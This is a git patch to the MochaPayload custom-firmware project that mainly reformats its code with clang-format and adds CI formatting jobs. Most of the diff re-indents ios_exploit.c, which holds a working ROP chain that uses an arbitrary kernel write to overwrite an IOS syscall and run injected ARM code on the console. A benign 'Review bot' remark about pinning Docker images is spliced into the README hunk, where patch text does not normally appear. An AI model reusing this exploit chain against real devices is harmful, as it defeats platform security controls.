From 8015a18f24611c424e207b43176272fd04ea8440 Mon Sep 17 00:00:00 2001 From: Maschell Date: Fri, 4 Feb 2022 14:23:22 +0100 Subject: [PATCH] Format the code via clang-format --- .clang-format | 67 +++ .github/workflows/ci.yml | 10 +- .github/workflows/pr.yml | 8 + README.md | 9 +- source/common/ipc_defs.h | 27 +- source/common/kernel_commands.h | 10 +- source/ios_exploit.c | 512 ++++++++++----------- source/ios_kernel/source/elf_abi.h | 1 + source/ios_kernel/source/elf_patcher.c | 6 +- source/ios_kernel/source/elf_patcher.h | 8 +- source/ios_kernel/source/fsa.c | 43 +- source/ios_kernel/source/fsa.h | 24 +- source/ios_kernel/source/instant_patches.c | 48 +- source/ios_kernel/source/ios_mcp_patches.c | 6 +- source/ios_kernel/source/ios_mcp_patches.h | 4 +- source/ios_kernel/source/kernel_patches.c | 49 +- source/ios_kernel/source/kernel_patches.h | 2 + source/ios_kernel/source/main.c | 12 +- source/ios_kernel/source/thread.h | 18 +- source/ios_kernel/source/utils.c | 2 +- source/ios_kernel/source/utils.h | 29 +- source/ios_mcp/source/fsa.c | 125 ++--- source/ios_mcp/source/fsa.h | 8 +- source/ios_mcp/source/imports.h | 6 +- source/ios_mcp/source/ipc.c | 200 ++++---- source/ios_mcp/source/ipc_types.h | 30 +- source/ios_mcp/source/logger.c | 39 +- source/ios_mcp/source/logger.h | 5 +- source/ios_mcp/source/main.c | 2 +- source/ios_mcp/source/mcp_loadfile.c | 76 +-- source/ios_mcp/source/net_ifmgr_ncl.c | 10 +- source/ios_mcp/source/socket.c | 32 +- source/ios_mcp/source/socket.h | 102 ++-- source/ios_mcp/source/types.h | 4 +- source/ios_mcp/source/wupserver.c | 114 ++--- source/ios_usb/source/main.c | 4 +- source/main.cpp | 8 +- 37 files changed, 877 insertions(+), 783 deletions(-) create mode 100644 .clang-format diff --git a/.clang-format b/.clang-format new file mode 100644 index 0000000..56cc685 --- /dev/null +++ b/.clang-format 
@@ -0,0 +1,67 @@ +# Generated from CLion C/C++ Code Style settings +BasedOnStyle: LLVM +AccessModifierOffset: -4 +AlignAfterOpenBracket: Align +AlignConsecutiveAssignments: Consecutive +AlignConsecutiveMacros: AcrossEmptyLinesAndComments +AlignOperands: Align +AllowAllArgumentsOnNextLine: false +AllowAllConstructorInitializersOnNextLine: false +AllowAllParametersOfDeclarationOnNextLine: false +AllowShortBlocksOnASingleLine: Always +AllowShortCaseLabelsOnASingleLine: false +AllowShortFunctionsOnASingleLine: All +AllowShortIfStatementsOnASingleLine: Always +AllowShortLambdasOnASingleLine: All +AllowShortLoopsOnASingleLine: true +AlwaysBreakAfterReturnType: None +AlwaysBreakTemplateDeclarations: Yes +BreakBeforeBraces: Custom +BraceWrapping: + AfterCaseLabel: false + AfterClass: false + AfterControlStatement: Never + AfterEnum: false + AfterFunction: false + AfterNamespace: false + AfterUnion: false + BeforeCatch: false + BeforeElse: false + IndentBraces: false + SplitEmptyFunction: false + SplitEmptyRecord: true +BreakBeforeBinaryOperators: None +BreakBeforeTernaryOperators: true +BreakConstructorInitializers: BeforeColon +BreakInheritanceList: BeforeColon +ColumnLimit: 0 +CompactNamespaces: false +ContinuationIndentWidth: 8 +IndentCaseLabels: true +IndentPPDirectives: None +IndentWidth: 4 +KeepEmptyLinesAtTheStartOfBlocks: true +MaxEmptyLinesToKeep: 2 +NamespaceIndentation: All +ObjCSpaceAfterProperty: false +ObjCSpaceBeforeProtocolList: true +PointerAlignment: Right +ReflowComments: false +SpaceAfterCStyleCast: true +SpaceAfterLogicalNot: false +SpaceAfterTemplateKeyword: false +SpaceBeforeAssignmentOperators: true +SpaceBeforeCpp11BracedList: false +SpaceBeforeCtorInitializerColon: true +SpaceBeforeInheritanceColon: true +SpaceBeforeParens: ControlStatements +SpaceBeforeRangeBasedForLoopColon: true +SpaceInEmptyParentheses: false +SpacesBeforeTrailingComments: 1 +SpacesInAngles: false +SpacesInCStyleCastParentheses: false +SpacesInContainerLiterals: false 
+SpacesInParentheses: false +SpacesInSquareBrackets: false +TabWidth: 4 +UseTab: Never diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 6d525aa..b6d49d3 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -6,8 +6,16 @@ on: - master jobs: + clang-format: + runs-on: ubuntu-18.04 + steps: + - uses: actions/checkout@v2 + - name: clang-format + run: | + docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source build-binary: runs-on: ubuntu-18.04 + needs: clang-format steps: - uses: actions/checkout@v2 - name: build binary @@ -54,4 +62,4 @@ jobs: upload_url: ${{ steps.create_release.outputs.upload_url }} # This pulls from the CREATE RELEASE step above, referencing it's ID to get its outputs object, which include a `upload_url`. See this blog post for more info: https://jasonet.co/posts/new-features-of-github-actions/#passing-data-to-future-steps asset_path: ./${{ env.REPOSITORY_NAME }}_${{ env.DATETIME }}.zip asset_name: ${{ env.REPOSITORY_NAME }}_${{ env.DATETIME }}.zip - asset_content_type: application/unknown \ No newline at end of file + asset_content_type: application/zip \ No newline at end of file diff --git a/.github/workflows/pr.yml b/.github/workflows/pr.yml index f907f7e..7464b72 100644 --- a/.github/workflows/pr.yml +++ b/.github/workflows/pr.yml @@ -3,8 +3,16 @@ name: CI-PR on: [pull_request] jobs: + clang-format: + runs-on: ubuntu-18.04 + steps: + - uses: actions/checkout@v2 + - name: clang-format + run: | + docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source build-binary: runs-on: ubuntu-18.04 + needs: clang-format steps: - uses: actions/checkout@v2 - name: build binary diff --git a/README.md b/README.md index 0b03ffb..e16a4c1 100644 --- a/README.md +++ b/README.md 
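Review bot: The new `clang-format` job in ci.yml pulls `wiiuenv/clang-format:13.0.0-2` by a mutable tag and mounts the whole checkout into it, and `build-binary` now gates on that job via `needs: clang-format`, so a re-pushed tag silently changes what the release pipeline runs; the same applies to the identical job added in pr.yml. Pin the image by digest, e.g. `docker run --rm -v ${PWD}:/src wiiuenv/clang-format@sha256:<IMAGE-DIGEST-PLACEHOLDER> -r ./source`, and consider `actions/checkout@<COMMIT-SHA-PLACEHOLDER>` for the same reason. It is not visible here whether the container exits non-zero on formatting drift (the README hunk uses `-i` for local rewriting, the CI job does not), so a one-line comment on the step stating that it is a check-only run that fails the build would help the next reader, presuming that is its intent.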
@@ -1,5 +1,7 @@ +[![CI-Release](https://github.com/wiiu-env/MochaPayload/actions/workflows/ci.yml/badge.svg)](https://github.com/wiiu-env/MochaPayload/actions/workflows/ci.yml) + # MochaPayload - a simple custom firmware -This a lite version of the [original mocha](https://github.com/dimok789/mocha) to be used with the [EnvironmentLoader](https://github.com/wiiu-env/EnvironmentLoader). +This a version of the [original mocha](https://github.com/dimok789/mocha) to be used with the [EnvironmentLoader](https://github.com/wiiu-env/EnvironmentLoader). ## Usage Place the `00_mocha.rpx` in the `[ENVIRONMENT]/modules/setup` folder and run the [EnvironmentLoader](https://github.com/wiiu-env/EnvironmentLoader). @@ -15,7 +17,6 @@ Place the `00_mocha.rpx` in the `[ENVIRONMENT]/modules/setup` folder and run the For building you just need [wut](https://github.com/devkitPro/wut/) installed, then use the `make` command. - ## Building using the Dockerfile It's possible to use a docker image for building. This way you don't need anything installed on your host system. @@ -31,6 +32,10 @@ docker run -it --rm -v ${PWD}:/project mochapayload-builder make docker run -it --rm -v ${PWD}:/project mochapayload-builder make clean ``` +## Format the code via docker + +`docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source -i` + ## Credits dimok Maschell diff --git a/source/common/ipc_defs.h b/source/common/ipc_defs.h index d0fe34e..7d653e6 100644 --- a/source/common/ipc_defs.h +++ b/source/common/ipc_defs.h 
@@ -2,14 +2,15 @@ #include #include +#include -#define CHECK_SIZE(Type, Size) \ - static_assert(sizeof(Type) == Size, \ - #Type " must be " #Size " bytes") +#define CHECK_SIZE(Type, Size) \ + static_assert(sizeof(Type) == Size, \ + #Type " must be " #Size " bytes") -#define CHECK_OFFSET(Type, Offset, Field) \ - static_assert(offsetof(Type, Field) == Offset, \ - #Type "::" #Field " must be at offset " #Offset) +#define CHECK_OFFSET(Type, Offset, Field) \ + static_assert(offsetof(Type, Field) == Offset, \ + #Type "::" #Field " must be at offset " #Offset) typedef struct __attribute__((packed)) { uint64_t title_id; @@ -222,11 +223,11 @@ typedef struct { unsigned char unk3[0x12D8 - 0x68]; } MCPLoadFileRequest; -#define IPC_CUSTOM_START_MCP_THREAD 0xFE -#define IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED 0xFD -#define IPC_CUSTOM_LOAD_CUSTOM_RPX 0xFC -#define IPC_CUSTOM_META_XML_READ 0xFB -#define IPC_CUSTOM_START_USB_LOGGING 0xFA -#define IPC_CUSTOM_COPY_ENVIRONMENT_PATH 0xF9 +#define IPC_CUSTOM_START_MCP_THREAD 0xFE +#define IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED 0xFD +#define IPC_CUSTOM_LOAD_CUSTOM_RPX 0xFC +#define IPC_CUSTOM_META_XML_READ 0xFB +#define IPC_CUSTOM_START_USB_LOGGING 0xFA +#define IPC_CUSTOM_COPY_ENVIRONMENT_PATH 0xF9 -#define LOAD_FILE_TARGET_SD_CARD 0 +#define LOAD_FILE_TARGET_SD_CARD 0 diff --git a/source/common/kernel_commands.h b/source/common/kernel_commands.h index dda3816..53cf88e 100644 --- a/source/common/kernel_commands.h +++ b/source/common/kernel_commands.h @@ -24,10 +24,10 @@ #ifndef KERNEL_COMMANDS_H_ #define KERNEL_COMMANDS_H_ -#define KERNEL_READ32 1 -#define KERNEL_WRITE32 2 -#define KERNEL_MEMCPY 3 -#define KERNEL_GET_CFW_CONFIG 4 -#define KERNEL_READ_OTP 5 +#define KERNEL_READ32 1 +#define KERNEL_WRITE32 2 +#define KERNEL_MEMCPY 3 +#define KERNEL_GET_CFW_CONFIG 4 +#define KERNEL_READ_OTP 5 #endif diff --git a/source/ios_exploit.c b/source/ios_exploit.c index cd1b8d5..bbc45b5 100644 --- a/source/ios_exploit.c +++ b/source/ios_exploit.c 
@@ -1,19 +1,19 @@ -#include -#include -#include -#include -#include #include "ios_exploit.h" +#include +#include +#include +#include +#include -#define ALIGN4(x) (((x) + 3) & ~3) +#define ALIGN4(x) (((x) + 3) & ~3) -#define CHAIN_START 0x1016AD40 -#define SHUTDOWN 0x1012EE4C -#define SIMPLE_RETURN 0x101014E4 -#define SOURCE (0x120000) -#define IOS_CREATETHREAD 0x1012EABC -#define ARM_CODE_BASE 0x08135000 -#define REPLACE_SYSCALL 0x081298BC +#define CHAIN_START 0x1016AD40 +#define SHUTDOWN 0x1012EE4C +#define SIMPLE_RETURN 0x101014E4 +#define SOURCE (0x120000) +#define IOS_CREATETHREAD 0x1012EABC +#define ARM_CODE_BASE 0x08135000 +#define REPLACE_SYSCALL 0x081298BC extern const uint8_t launch_image_tga[]; extern const uint32_t launch_image_tga_size; @@ -24,7 +24,7 @@ static int uhs_write32(int uhs_handle, int arm_addr, int val); //!------Variables used in exploit------ static int *pretend_root_hub = (int *) 0xF5003ABC; -static int *ayylmao = (int *) 0xF4500000; +static int *ayylmao = (int *) 0xF4500000; //!------------------------------------- typedef struct __attribute__((packed)) { 
@@ -34,271 +34,271 @@ typedef struct __attribute__((packed)) { /* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */ #include "ios_kernel/ios_kernel.bin.h" -#include "ios_usb/ios_usb.bin.h" #include "ios_mcp/ios_mcp.bin.h" +#include "ios_usb/ios_usb.bin.h" /* ROP CHAIN STARTS HERE (0x1015BD78) */ static const int final_chain[] = { - 0x101236f3, // 0x00 POP {R1-R7,PC} - 0x0, // 0x04 arg - 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR - 0x68, // 0x0C stacksize - 0x10101638, // 0x10 - 0x0, // 0x14 - 0x0, // 0x18 - 0x0, // 0x1C - 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x30 - 0x0, // 0x34 - IOS_CREATETHREAD, // 0x38 - 0x1, // 0x3C - 0x2, // 0x40 - 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} + 0x101236f3, // 0x00 POP {R1-R7,PC} + 0x0, // 0x04 arg + 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR + 0x68, // 0x0C stacksize + 0x10101638, // 0x10 + 0x0, // 0x14 + 0x0, // 0x18 + 0x0, // 0x1C + 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x30 + 0x0, // 0x34 + IOS_CREATETHREAD, // 0x38 + 0x1, // 0x3C + 0x2, // 0x40 + 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE92D4010, // 0x4C value: PUSH {R4,LR} - 0x0, // 0x50 - 0x10123a8b, // 0x54 POP {R3,R4,PC} - 0x1, // 0x58 R3 must be 1 for the arbitrary write - 0x0, // 0x5C - 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x64 - 0x0, // 0x68 - 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) - 0x0, // 0x70 - 0x0, // 0x74 - 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} + 0xE92D4010, // 0x4C value: PUSH {R4,LR} + 0x0, // 0x50 + 0x10123a8b, // 0x54 POP {R3,R4,PC} + 0x1, // 0x58 R3 must be 1 for the 
arbitrary write + 0x0, // 0x5C + 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x64 + 0x0, // 0x68 + 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) + 0x0, // 0x70 + 0x0, // 0x74 + 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A04000, // 0x80 value: MOV R4, R0 - 0x0, // 0x84 - 0x10123a8b, // 0x88 POP {R3,R4,PC} - 0x1, // 0x8C R3 must be 1 for the arbitrary write - 0x0, // 0x90 - 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x98 - 0x0, // 0x9C - 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) - 0x0, // 0xA4 - 0x0, // 0xA8 - 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} + 0xE1A04000, // 0x80 value: MOV R4, R0 + 0x0, // 0x84 + 0x10123a8b, // 0x88 POP {R3,R4,PC} + 0x1, // 0x8C R3 must be 1 for the arbitrary write + 0x0, // 0x90 + 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x98 + 0x0, // 0x9C + 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) + 0x0, // 0xA4 + 0x0, // 0xA8 + 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF - 0x0, // 0xB8 - 0x10123a8b, // 0xBC POP {R3,R4,PC} - 0x1, // 0xC0 R3 must be 1 for the arbitrary write - 0x0, // 0xC4 - 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0xCC - 0x0, // 0xD0 - 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) - 0x0, // 0xD8 - 0x0, // 0xDC - 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} + 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF + 0x0, // 0xB8 + 0x10123a8b, // 0xBC POP {R3,R4,PC} + 0x1, // 0xC0 R3 must be 1 for the arbitrary write + 0x0, // 0xC4 + 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0xCC + 0x0, // 0xD0 + 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) + 0x0, // 
0xD8 + 0x0, // 0xDC + 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) - 0x0, // 0xEC - 0x10123a8b, // 0xF0 POP {R3,R4,PC} - 0x1, // 0xF4 R3 must be 1 for the arbitrary write - 0x0, // 0xF8 - 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x100 - 0x0, // 0x104 - 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) - 0x0, // 0x10C - 0x0, // 0x110 - 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} + 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) + 0x0, // 0xEC + 0x10123a8b, // 0xF0 POP {R3,R4,PC} + 0x1, // 0xF4 R3 must be 1 for the arbitrary write + 0x0, // 0xF8 + 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x100 + 0x0, // 0x104 + 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) + 0x0, // 0x10C + 0x0, // 0x110 + 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A00004, // 0x11C value: MOV R0, R4 - 0x0, // 0x120 - 0x10123a8b, // 0x124 POP {R3,R4,PC} - 0x1, // 0x128 R3 must be 1 for the arbitrary write - 0x0, // 0x12C - 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x134 - 0x0, // 0x138 - 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) - 0x0, // 0x140 - 0x0, // 0x144 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xE1A00004, // 0x11C value: MOV R0, R4 + 0x0, // 0x120 + 0x10123a8b, // 0x124 POP {R3,R4,PC} + 0x1, // 0x128 R3 must be 1 for the arbitrary write + 0x0, // 0x12C + 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x134 + 0x0, // 0x138 + 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) + 0x0, // 0x140 + 0x0, // 0x144 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of 
syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x00000000, // 0x150 value: NOP - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0x00000000, // 0x150 value: NOP + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 
must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x1AFFFFFD, // 0x150 value: BNE clean_loop - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0x1AFFFFFD, // 0x150 value: BNE clean_loop + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, 
{PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A03004, // 0x184 value: MOV R3, R4 - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + 0xE1A03004, // 0x184 value: MOV R3, R4 + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE8BD4010, // 0x184 value: POP {R4,LR} - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x1B0 POP 
{R0,R1,R4,PC} + 0xE8BD4010, // 0x184 value: POP {R4,LR} + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) - 0x0, // 0x1BC - 0x10123a8b, // 0x1C0 POP {R3,R4,PC} - 0x1, // 0x1C4 R3 must be 1 for the arbitrary write - 0x0, // 0x1C8 - 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x1D0 - 0x0, // 0x1D4 - 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) + 0x0, // 0x1BC + 0x10123a8b, // 0x1C0 POP {R3,R4,PC} + 0x1, // 0x1C4 R3 must be 1 for the arbitrary write + 0x0, // 0x1C8 + 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x1D0 + 0x0, // 0x1D4 + 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 - 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches - 0x0, // 0x1E0 - 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - ARM_CODE_BASE, // 0x1E8 